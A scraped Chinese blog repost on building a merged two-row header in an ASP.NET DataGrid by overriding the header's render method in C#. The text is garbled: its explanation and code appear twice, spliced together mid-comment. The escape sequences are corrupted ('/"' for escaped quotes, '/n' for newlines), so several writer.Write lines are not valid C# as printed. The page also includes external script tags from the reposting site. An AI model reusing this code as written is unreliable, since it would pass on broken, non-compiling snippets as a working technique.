<script language='javascript' src='http://www.shiqiaotou.com/donetk/Header.js'></script> 在网上搜索了半天,有以下几个方法:
1. 孟子E章的 ()
隐藏DataGrid的表头,在DataGrid的上放画一个多行表头.
不方便的地方是::
a. 对齐表头与DataGrid各列,有点麻烦.
b. 如果我要把DataGrid(表头形式,数据内容)导进Excel,则不会看到多行表头(多行表头这里不属于DataGrid)
2. 直接更改DataGrid的表头样式
3.使用RenderMethod委托可以实现DataGrid表头的合并,DataGrid的表头转化为用Table来控制
请参照:http://terrylee.cnblogs.com/archive/2005/09/29/246576.aspx
文章来源于 http://www.cnblogs.com/zhangzs8896 版权归原作者所有<script language='javascript' src='http://www.shiqiaotou.com/donetk/Footer.js'></script>
1. 孟子E章的 ()
隐藏DataGrid的表头,在DataGrid的上放画一个多行表头.
不方便的地方是::
a. 对齐表头与DataGrid各列,有点麻烦.
b. 如果我要把DataGrid(表头形式,数据内容)导进Excel,则不会看到多行表头(多行表头这里不属于DataGrid)
2. 直接更改DataGrid的表头样式
3.使用RenderMethod委托可以实现DataGrid表头的合并,DataGrid的表头转化为用Table来控制
请参照:http://terrylee.cnblogs.com/archive/2005/09/29/246576.aspx
/**/
/// <summary>
/// 创建Item
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void DataGrid_Total_ItemCreated( object sender, System.Web.UI.WebControls.DataGridItemEventArgs e)
{
//将Item的呈现方法定向到自定义的呈现方法上
ListItemType lit = e.Item.ItemType;
if(ListItemType.Header == lit)
{
e.Item.SetRenderMethodDelegate(new RenderMethod(NewRenderMethod));
}
}
/**/ /// <summary>
/// 自定义的Item呈现方法
/// </summary>
/// <param name="writer"></param>
/// <param name="ctl"></param>
private void NewRenderMethod(HtmlTextWriter writer,Control ctl)
{
//不需要从<TR>标签开始
//第一列"表号",必须有rowspan属性
TableCell cell1 = (TableCell)ctl.Controls[0];
cell1.Attributes.Add("rowspan","2");
cell1.Attributes.Add("align","center");
cell1.RenderControl(writer);
//输出“电度表”列
writer.Write("<TD colspan=/"4/" rowspan=/"1/" align=/"center/">电度表</TD>/n");
//“月末核算(度)”列必须有rowspan属性
TableCell cell = (TableCell)ctl.Controls[ctl.Controls.Count - 1];
cell.Attributes.Add("rowspan","2");
cell.Attributes.Add("align","center");
cell.RenderControl(writer);
//现在关闭第一行
writer.Write("</TR>/n");
//将设计时的样式属性添加到第二行使得两行的外观相似
this.DataGrid_Total.HeaderStyle.AddAttributesToRender(writer);
//插入第二行
writer.RenderBeginTag("TR");
//呈现除了最后一列(刚才已经呈现过了)外的所有在设计时定义的cells
for(int i=1;i<=ctl.Controls.Count-2;i++)
{
ctl.Controls[i].RenderControl(writer);
}
//不需要以</TR>结束
}
/// 创建Item
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void DataGrid_Total_ItemCreated( object sender, System.Web.UI.WebControls.DataGridItemEventArgs e)
{
//将Item的呈现方法定向到自定义的呈现方法上
ListItemType lit = e.Item.ItemType;
if(ListItemType.Header == lit)
{
e.Item.SetRenderMethodDelegate(new RenderMethod(NewRenderMethod));
}
}
/**/ /// <summary>
/// 自定义的Item呈现方法
/// </summary>
/// <param name="writer"></param>
/// <param name="ctl"></param>
private void NewRenderMethod(HtmlTextWriter writer,Control ctl)
{
//不需要从<TR>标签开始
//第一列"表号",必须有rowspan属性
TableCell cell1 = (TableCell)ctl.Controls[0];
cell1.Attributes.Add("rowspan","2");
cell1.Attributes.Add("align","center");
cell1.RenderControl(writer);
//输出“电度表”列
writer.Write("<TD colspan=/"4/" rowspan=/"1/" align=/"center/">电度表</TD>/n");
//“月末核算(度)”列必须有rowspan属性
TableCell cell = (TableCell)ctl.Controls[ctl.Controls.Count - 1];
cell.Attributes.Add("rowspan","2");
cell.Attributes.Add("align","center");
cell.RenderControl(writer);
//现在关闭第一行
writer.Write("</TR>/n");
//将设计时的样式属性添加到第二行使得两行的外观相似
this.DataGrid_Total.HeaderStyle.AddAttributesToRender(writer);
//插入第二行
writer.RenderBeginTag("TR");
//呈现除了最后一列(刚才已经呈现过了)外的所有在设计时定义的cells
for(int i=1;i<=ctl.Controls.Count-2;i++)
{
ctl.Controls[i].RenderControl(writer);
}
//不需要以</TR>结束
}
文章来源于 http://www.cnblogs.com/zhangzs8896 版权归原作者所有<script language='javascript' src='http://www.shiqiaotou.com/donetk/Footer.js'></script>